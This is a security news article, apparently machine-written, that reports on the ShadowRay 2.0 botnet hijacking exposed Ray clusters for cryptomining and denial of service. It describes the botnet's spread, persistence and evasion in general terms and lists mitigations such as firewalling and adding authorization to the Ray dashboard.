Ethical Hacking News
The ShadowRay 2.0 botnet is spreading across unpatched Ray clusters, hijacking their computing power for illicit cryptocurrency mining. This highly sophisticated attack exploits a critical missing authentication bug in the Ray open-source AI framework, leaving many organizations vulnerable to this menace.
ShadowRay 2.0 is a highly sophisticated botnet spreading across unpatched Ray clusters for illicit cryptocurrency mining.The attack exploits a critical missing authentication bug in the Ray open-source AI framework, leaving many organizations vulnerable.The botnet uses GitLab and GitHub to deliver malware, showcasing its ability to quickly resume operations after takedown efforts.The payloads use orchestration capabilities to pivot laterally to non-internet-facing nodes, spread malware, and establish persistence.Large language models are likely used by the attackers, as evident from the malware's structure and error handling patterns.The infection chain includes region-specific versions of malware for Chinese victims and tactics to evade detection, such as disguising malicious processes.The attack surface is created by more than 230,500 publicly accessible Ray servers, making it a lucrative target for bad actors.Measures to mitigate the threat include configuring firewall rules, adding authorization, and using tools like the "Ray Open Ports Checker".The botnet's transformation into a multi-purpose platform with implications for denial-of-service attacks and rival mining infrastructure highlights its potential impact.
The cybersecurity landscape has witnessed numerous attacks in recent years, each with its unique characteristics and methods of exploitation. However, a recent wave of attacks stands out for its sophistication and the scale at which it is being carried out. Known as ShadowRay 2.0, this botnet is spreading across unpatched Ray clusters, hijacking their computing power to engage in illicit cryptocurrency mining. The attack exploits a critical missing authentication bug in the Ray open-source artificial intelligence (AI) framework, leaving many organizations vulnerable to this menace.
At its core, ShadowRay 2.0 is an evolution of a prior wave that was observed between September 2023 and March 2024. This earlier attack also utilized malicious jobs submitted through the Ray Job Submission API on exposed dashboards to compromise Ray clusters. The compromised clusters were then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that could spread from one victim to another. This initial wave of attacks demonstrated the potential for this botnet to cause significant disruptions.
One of the most striking aspects of ShadowRay 2.0 is its use of GitLab and GitHub to deliver malware. The attackers created repositories with names such as "ironern440-group" and "thisisforwork440-ops," both of which are no longer accessible. However, in response to takedown efforts, the cybercriminals have responded by creating new accounts, showcasing their tenacity and ability to quickly resume operations.
The payloads used in ShadowRay 2.0 leverage the platform's orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab. These tactics are characteristic of highly sophisticated attacks, which often rely on exploiting vulnerabilities in popular platforms like Ray.
The use of large language models (LLMs) is also noteworthy, as it suggests that the attackers have access to advanced tools and resources. The malware's structure, comments, and error handling patterns all point to this conclusion. This assessment is based on the malware's behavior and the potential capabilities of LLMs in creating complex payloads.
The infection chain of ShadowRay 2.0 involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It also includes a mechanism designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize mining gains from hosts.
Another notable aspect of this attack is its use of tactics to evade detection, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. These strategies are designed to make the botnet's presence harder to detect, allowing it to operate undetected for longer periods.
The fact that more than 230,500 Ray servers are publicly accessible has created a lucrative attack surface for bad actors. This is particularly concerning given that Ray is meant to be deployed within controlled network environments. The findings highlight the need for greater vigilance and proactive measures to prevent such attacks.
To mitigate this threat, Anyscale has released a "Ray Open Ports Checker" tool to validate proper cluster configuration and prevent accidental exposure. Other strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default). These steps aim to make it more difficult for attackers to exploit vulnerabilities in the first place.
Furthermore, researchers have observed that attackers are leveraging compromised Ray clusters to deploy sockstress, a TCP state exhaustion tool. This suggests that the compromised clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.
This transformation of the operation from pure cryptojacking into a multi-purpose botnet has significant implications. Attackers can now utilize this platform for various malicious activities, further increasing its potential impact.
The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure are also occurring. This highlights the global nature of the threat and the need for a coordinated response to counter it.
In light of these findings, it is clear that the ShadowRay 2.0 botnet poses a significant threat to organizations using Ray clusters. The ongoing nature of this attack, coupled with its use of sophisticated tactics, underscores the importance of vigilance and proactive measures in cybersecurity.
Related Information:
https://www.ethicalhackingnews.com/articles/The-ShadowRay-20-Botnet-A-Cryptocurrency-Mining-Menace-Spreading-Across-Unpatched-Ray-Clusters-ehn.shtml
https://thehackernews.com/2025/11/shadowray-20-exploits-unpatched-ray.html
Published: Thu Nov 20 11:45:13 2025 by llama3.2 3B Q4_K_M
